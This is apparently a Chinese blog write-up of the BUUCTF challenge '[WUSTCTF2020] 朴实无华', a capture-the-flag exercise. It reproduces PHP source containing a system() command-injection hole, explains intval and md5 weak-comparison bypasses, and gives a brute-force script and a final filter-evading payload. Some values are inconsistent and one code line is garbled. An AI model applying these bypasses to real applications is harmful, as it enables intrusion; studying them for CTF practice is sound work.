BUUCTF WEB 朴实无华1

最新推荐文章于 2023-12-25 09:58:39 发布
最新推荐文章于 2023-12-25 09:58:39 发布
阅读量178 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/122057863
版权

打开场景,一堆乱码,让我们不要看headers,那不用说了,肯定hint在headers里面,burp抓包,当前页面headers没有啥的
那就扫目录吧,扫出来一个robots.txt,进
有一个fAke_flaaaaag.php,很明显是假的,我们再看headers头还是没有啥有用的
访问/fAke_flaaaaag.php,这次抓包发现一个look at me头,终于发现了正确的flag地址:/fl4g.php
什么,这就满足了?naive!访问下来是一堆源码,代码审计

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

一眼就看到 system($get_flag);那么要到这里该怎么办呢,过三关:

 if(intval($num) < 2020 && intval($num + 1) > 2021)
if ($md5==md5($md5))
str_ireplace("cat", "wctf2020", $get_flag);5($md5))

真的是简单粗暴啊
首先过第一关,intval函数其实是有一个bug的,对于科学计数法表示的字符串形如’2e10’,他会先转字符串再比较,判定他是2
而如果说是’2e10’+1,他会先进行计算,结果是200000…1,当然这跟php版本有关,只在某些特定版本有效,5.5.38有效
然后是第二关,md5加密后和自己的md5值相等,其实和第一关思路差不多。还是因为php的弱类型比较
0e开头,md5加密后还是0e开头,那么我们就认为这两个值相等,这里其实参考了撞库的思想,其他的比如1e和1e相等的数不知道有没有
自己写脚本跑

import hashlib
def run():
    i = 0
    while True:
        text = '0e{}'.format(i)
        m =  hashlib.md5(text.encode('utf-8')).hexdigest()
        print(text,m)
        if m[0:2] == '0e' :
            if m[2:].isdigit():
                print('find it:',text,":",m)
                break
        i +=1
run()

跑出来md5=0e215963017
第三关,str_ireplace(“cat”, “wctf2020”, $get_flag);把cat替换成wctf2020,绕过的就是cat不能用
先ls一下,确定flag的位置,然后绕过cat命令,那其他命令可多了去了,tac,sort。。。随便整一个,或者ca\t也行,总之就是一个绕过,%09绕过空格过滤(PHP常用姿势)
最终payload:num=1e10&md5=0e215962017&get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
参考视频连接:https://www.bilibili.com/video/BV1u3411x7vs/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 451
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
BUUCTF Web [WUSTCTF2020]朴实无华1
网安小趴菜
10-09 165
BUUCTF Web [WUSTCTF2020]朴实无华1
BUUCTF [WUSTCTF2020] 朴实无华
Senimo
12-16 1065
BUUCTF [WUSTCTF2020]朴实无华 考点: intval()函数科学计数法绕过 网页Unicode编码 变量md5()加密后与原值相等 nl、tac等替代cat命令 启动靶机: 根据标签名: <title>人间极乐bot</title> 猜测可能有robots.txt协议,访问: 得到假的flag: 根据之前的Warning: 猜测和请求头有关,使用BurpSuite抓取数据包: 在Response中发现新的提示: Look_at_me: /fl4g.p
buuctf-朴实无华
m0_62094846的博客
04-06 298
扫目录也没扫出什么东西 标题上有bot,想到robots.txt(有点牵强) 继续查 然后线索就断了,但是这个页面应该不会没用,抓包看看(之前页面中header information-headers可能也暗示了查看头文件) 然后是一串乱码,可以在火狐浏览器的更多工具里查找修复文字编码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__fil...
buuctf-[WUSTCTF2020]朴实无华(小宇特详解)
小宇的web博客
02-23 981
buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息) 如何修复火狐浏览器的乱码问题(最新版)_小宇的web博客-CSDN博客 <?php header('Content-type:text/html;charset=
朴实无华的自我介绍精选.doc
10-11
朴实无华的自我介绍精选.doc
note:就是一个朴实无华的笔记本
04-02
对数序列就是一个朴实无华的笔记本
logseq:就是一个朴实无华的笔记本
03-29
对数序列 就是一个朴实无华的笔记本
zapp:朴实无华的用作快速建造项目的基础库
03-19
为快速建造项目的基础库 开始 app := zapp . NewApp ( "test" ) app ....扩展性 组件 我们实现了一些组件,可以在找到 服务 我们实现了一些服务,可以在找到 ...作为一个基础库,我们尽量减少了依赖包,只需要以下包依赖 ...
BUUCTF之[WUSTCTF2020]朴实无华 --------------- MD5碰撞
weixin_44632787的博客
10-07 695
启动挑战页面 访问一下robots.txt看看有没有什么提示 发现有个可疑的链接:/fAke_f1agggg.php 到这里就可以看到重要的源码了 <img src="/img.jpg"> <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num .
[WUSTCTF2020]朴实无华1
最新发布
whale_waves的博客
12-25 540
这里利用到intval的漏洞,传入科学计数法时只会要e之前的数字,如果传入1e10,intval(1e4)=1,但是intval(1e4+1)=10001,因为这里是科学计数法加算数,所以会先计算了,在取值,所以理论上来说只要e前面的数字小于2000,并且科学计算以后大于2001就能绕过。首先strstr(1,2)会匹配1里2出现的地方以后的剩余的所有字符(空格用/**/替换)跑buuctf的题需要限速显示,不然跑太快了会429报错。这里需要让他原本弱等于md5以后的自己。打开以后,点击ie浏览器的图标。
[WUSTCTF2020]朴实无华1--writeup
m0_65080524的博客
08-15 173
而1e4其实等于10000 这是一种科学计数法,具体来说,1e4 中的 1 表示基数(也称为尾数或有效数字),而 4 表示指数。这可以解释为 1 乘以 10 的 4 次方,即 1 * 10^4,等于 10000。要求是原值与md5值进行弱比较相等 而有一个值正好即0e215962017 因为是弱比较,而且0e215962017的md值也是0e开头所以它们弱比较即是0=0。intval()函数作用是在处理数据时会在接触到字符串时停止,即11y58=11,x58=0,1e4=1。发现fl4g.php点开看看。
[WUSTCTF2020]朴实无华 1
m0_62879498的博客
05-07 1247
[WUSTCTF2020]朴实无华 1 进入环境,什么也没有得到,估计就是需要我们进行目录扫描了 用dirsearch进行把爆破扫描 环境的问题,很多的环境在进行扫描的时候,如果访问过快,就会返回429 ,建议将线程数调小,否则会出现文件 429请况,影响结果 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30 我们尝试访问文件 访问 fAke_f1agggg.php 使用 bp抓包 查看情况 发现了新的文件,尝试访问 发现了朱
CTF中gdb调试run权限不够解决方法
weixin_52296042的博客
10-01 1523
最为一个刚学习二进制的小白,遇到这种问题给蒙了。而且是自学,没人指路,在csdn上也找不到类似 的 后来加群问了大佬。得到方法 问题截图: 解决方法:给文件权限 chmod 744 file chmod +x file
buuctf-[WUSTCTF2020]朴实无华
2202_75317918的博客
09-19 314
buuctf-[WUSTCTF2020]朴实无华
BUUCTF(web刷题记录一)
nareku的博客
04-16 8597
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
Docker-学习笔记-ctf_xinded
Peanuts
02-01 882
因为出题目的原因,接受题目的人说要我提供dockerfile。。可是我这样的小白怎么会,只能是现学现卖一波了。 在github上有个开源的dockerfile针对pwn题部署的这里对其进行一个解读 项目中的文件就是大概这几个 dockerfile学习 FROM ubuntu:16.04 #需要的镜像文件的系统 RUN sed -i "s/http:\/\/archive.ubuntu.com/...
CTF
Break-attack的博客
09-27 6396
一、题目:低个头 描述:EWAZX RTY TGB IJN IO KL 请破解该密文 flag格式:XXX 明文 提交:直接提交明文(大写) 由“低个头”可以猜测是由键盘组成的,可能是电脑键盘也可能是手机键盘。先由电脑键盘猜测,推断可能是字符包围,使用画笔进行绘制得出答案:CTF 二、题目:来题中等的吧 描述:下载该附件,获取flag flag格式:XXX 提交:直接提交XXX 打开文件...
BUUCTF-社团考核
qq_60905276的博客
09-24 1037
BUUCTF上面的题
[WUSTCTF2020]朴实无华
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值